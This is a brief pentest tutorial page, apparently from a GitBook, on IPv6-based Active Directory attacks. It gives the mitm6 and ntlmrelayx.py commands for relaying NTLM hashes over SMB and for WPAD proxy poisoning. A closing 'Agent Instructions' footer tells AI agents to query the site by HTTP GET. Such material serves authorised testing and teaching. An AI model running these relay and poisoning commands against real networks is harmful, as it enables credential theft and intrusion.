# Basic attack

The principle is pretty much the same as the one we saw earlier with increased effectiveness.

First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network.

```
mitm6 -d test.local
```

For the second part of our attack, we use  [ntlmrelayx](https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py) to relay the captured hashes. Now i will show two possible ways to use this tool, first through a simple SMB relay like we saw earlier 

```
ntlmrelayx.py -6 -tf Targets.txt -socks -smb2support
```

In this case, the attack is pretty much the same as the one we saw earlier we juste replaced responder with mitm6 for the obvious reasons previously mentionned.

now, another attack is possible through **WPAD serving.** WPAD is a protocol used to ensure all systems in an organization use the same web proxy configuration. Instead of individually modifying configurations on each device connected to a network, WPAD locates a proxy configuration file and applies the configuration automatically. More details about this attack can be found in the references. using ntlmrelayx to also implement this attack, we launch the attack using the following command :

```
ntlmrelayx.py -6 -wh attacker.test.local -tf targets.txt -l loot -socks -debug
```

**References :**

{% embed url="<https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/initial-attack-vectors/ipv6-attacks/basic-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.